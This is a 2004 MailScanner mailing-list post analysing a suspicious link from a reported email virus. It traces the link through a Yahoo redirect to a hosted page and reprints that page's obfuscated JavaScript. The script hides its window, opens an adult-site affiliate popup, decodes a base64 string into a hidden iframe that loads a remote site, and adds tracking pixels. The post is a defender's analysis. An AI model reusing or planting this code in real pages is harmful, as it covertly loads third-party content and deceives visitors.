New virus?

Spicer, Kevin Kevin.Spicer at BMRB.CO.UK
Tue May 11 15:38:42 IST 2004 

Rabellino Sergio wrote:
> Remco Barendse wrote:
>> This is the complete contents of the df file of the virus (I would
>> NOT open the url on a Winblows box!):
>> 
>> <HTML><HEAD></HEAD><BODY bgColor=#ffffff><DIV><FONT face=Arial
>> size=2><BR><A href="http://drs.yahoo.com/ecem.com/NEWS/*http://
>> 
> www.security-warning.biz/personal6/maljo24/www.YAHOO.com/#http
://drs.yahoo.com/ecem.com/NEWS">http://drs.yahoo.com/ecem.com/NE
> WS</A></FONT></DIV></BODY></HTML>

Hmm, someone really doesn't want us to find out what they are up to!

Heres what I've found so far...
Any url at http://drs.yahoo.com/ followed by a * redirects to the site following the *
th bit after the # seems to be pointless
www.security-warning.com takes you to terra's website (Spanish ISP I think?) 
The specific URL takes to to a page (presumably customer space) that redirects to a page called terra.com in the same directory.  That in turn contains the following content, which is mostly javascript obfuscation.....  [by the way both pages contains hundreds of lines of whitespace]



<html><head><title>| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | </title>
<script language=javascript>
function stoperror() {
return true
}
window.onerror=stoperror;
self.moveTo(5000,5000);
self.blur();

var args='left=0,top=0,width='+screen.availWidth-60+',height='+screen.availHeight-60+',fullscreen=0,toolbar=1,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1';
window.open('http://www.danni.com/directors/dannicash?dcwid=100863&redirpg=www.danni.com/free/modelsdir.html','',args);
</script>
</head>
<body onFocus="window.blur();" onMouseOver="window.blur();">

<SCRIPT language=JavaScript>

function bcd(str) {
    var result = "";
    var i = 0;
    var x;
    var shiftreg = 0;
    var count = -1;
    for (i=0; i < str.length; i++) {
        c = str.charAt(i);
        if ('A' <= c && c <= 'Z')
            x = str.charCodeAt(i) - 65;
        else if ('a' <= c && c <= 'z')
            x = str.charCodeAt(i) - 97 + 26;
        else if ('0' <= c && c <= '9')
            x = str.charCodeAt(i) - 48 + 52;
        else if (c == '+')
            x = 62;
        else if (c == '/')
            x = 63;
        else
            continue;
        count++;
        switch (count % 4)
        {
        case 0:
            shiftreg = x;
            continue;
        case 1:
            v = (shiftreg<<2) | (x >> 4);
            shiftreg = x & 0x0F;
            break;
        case 2:
            v = (shiftreg<<4) | (x >> 2);
            shiftreg = x & 0x03;
            break;
        case 3:
            v = (shiftreg<<6) | (x >> 0);
            shiftreg = x & 0x00;
            break;
        }
            result = result + String.fromCharCode(v);
    }
    s=result.toString();
};


</script>
<a target="_top" href="http://t.extreme-dm.com/?login=vrn123">
<img src="http://t1.extreme-dm.com/i.gif" height=1
border=0 width=1 alt=""></a><script language="javascript1.2"><!--
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;bcd("PGlmcmFtZSB3aWR0aD0wIGhlaWdodD0wIHNyYz0iaHR0cDovL2NvdW50ZXIuc3Byb3MuY29tLzEvY291bnQuaHRtbCI+PC9pZnJhbWU+");document.writeln(s);//--></script><script language="javascript"><!--
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=\"http://t0.extreme-dm.com",
"/c.g?tag=vrn123&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+"\" height=1 width=1>");//-->
</script><noscript><img height=1 width=1 alt=""
src="http://t0.extreme-dm.com/c.g?tag=vrn123&j=n"></noscript>

</body></html>



BMRB International 
http://www.bmrb.co.uk
+44 (0)20 8566 5000
_________________________________________________________________
This message (and any attachment) is intended only for the 
recipient and may contain confidential and/or privileged 
material.  If you have received this in error, please contact the 
sender and delete this message immediately.  Disclosure, copying 
or other action taken in respect of this email or in 
reliance on it is prohibited.  BMRB International Limited 
accepts no liability in relation to any personal emails, or 
content of any email which does not directly relate to our 
business.

-------------------------- MailScanner list ----------------------
To leave, send    leave mailscanner    to jiscmail at jiscmail.ac.uk
Before posting, please see the Most Asked Questions at
http://www.mailscanner.biz/maq/     and the archives at
http://www.jiscmail.ac.uk/lists/mailscanner.html

More information about the MailScanner mailing list